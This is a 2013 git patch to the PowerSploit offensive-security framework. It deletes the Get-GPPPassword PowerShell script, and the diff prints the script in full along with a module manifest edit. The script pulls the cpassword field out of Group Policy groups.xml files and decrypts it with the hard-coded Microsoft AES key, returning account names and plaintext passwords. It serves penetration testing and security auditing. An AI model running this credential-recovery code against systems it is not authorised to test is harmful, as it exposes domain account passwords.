From 371c65c9a7493f0a8e02a6f888d6b75a42a77566 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Wed, 3 Jul 2013 05:46:44 -0400 Subject: Updated Get-GPPPassword --- Recon/Get-GPPPassword.ps1 | 106 ---------------------------------------------- Recon/Recon.psd1 | 4 +- 2 files changed, 2 insertions(+), 108 deletions(-) delete mode 100644 Recon/Get-GPPPassword.ps1 (limited to 'Recon') diff --git a/Recon/Get-GPPPassword.ps1 b/Recon/Get-GPPPassword.ps1 deleted file mode 100644 index b22fb74..0000000 --- a/Recon/Get-GPPPassword.ps1 +++ /dev/null @@ -1,106 +0,0 @@ -function Get-GPPPassword -{ -<# -.SYNOPSIS - -Retrieves the plaintext password for accounts pushed through Group Policy in groups.xml. - -PowerSploit Function: Get-GPPPassword -Author: Chris Campbell (@obscuresec) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password. - -.PARAMETER Path - -The path to the targeted groups.xml file. - -.EXAMPLE - -Get-GPPPassword -path c:\demo\groups.xml - -.LINK - -http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences -http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html -#> - - Param ( - [Parameter(Position = 0, Mandatory = $True)] - [String] - $Path = "$PWD\groups.xml" - ) - - #Function to pull encrypted password string from groups.xml - function Parse-cPassword { - - try { - [xml] $Xml = Get-Content ($Path) - [String] $Cpassword = $Xml.Groups.User.Properties.cpassword - } catch { Write-Error "No Password Policy Found in File!" } - - return $Cpassword - } - - #Function to look to see if the administrator account is given a newname - function Parse-NewName { - - [xml] $Xml = Get-Content ($Path) - [String] $NewName = $Xml.Groups.User.Properties.newName - - return $NewName - } - - #Function to parse out the Username whose password is being specified - function Parse-UserName { - - try { - [xml] $Xml = Get-Content ($Path) - [string] $UserName = $Xml.Groups.User.Properties.userName - } catch { Write-Error "No Username Specified in File!" } - - return $UserName - } - - #Function that decodes and decrypts password - function Decrypt-Password { - - try { - #Append appropriate padding based on string length - $Pad = "=" * (4 - ($Cpassword.length % 4)) - $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad) - #Create a new AES .NET Crypto Object - $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider - #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 - [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, - 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) - #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value - $AesIV = New-Object Byte[]($AesObject.IV.Length) - $AesObject.IV = $AesIV - $AesObject.Key = $AesKey - $DecryptorObject = $AesObject.CreateDecryptor() - [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length) - - return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) - } catch { Write-Error "Decryption Failed!" } - - } - - $Cpassword = Parse-cPassword - $Password = Decrypt-Password - $NewName = Parse-NewName - $UserName = Parse-UserName - - $Results = New-Object System.Object - - Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName - Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName - Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password - - return $Results - -} diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 59c6377..afcb7fb 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -73,8 +73,8 @@ AliasesToExport = '' ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) # List of all files packaged with this module -FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1', - 'Invoke-ReverseDnsLookup.ps1', 'Usage.md' +FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1', + 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' -- cgit v1.2.3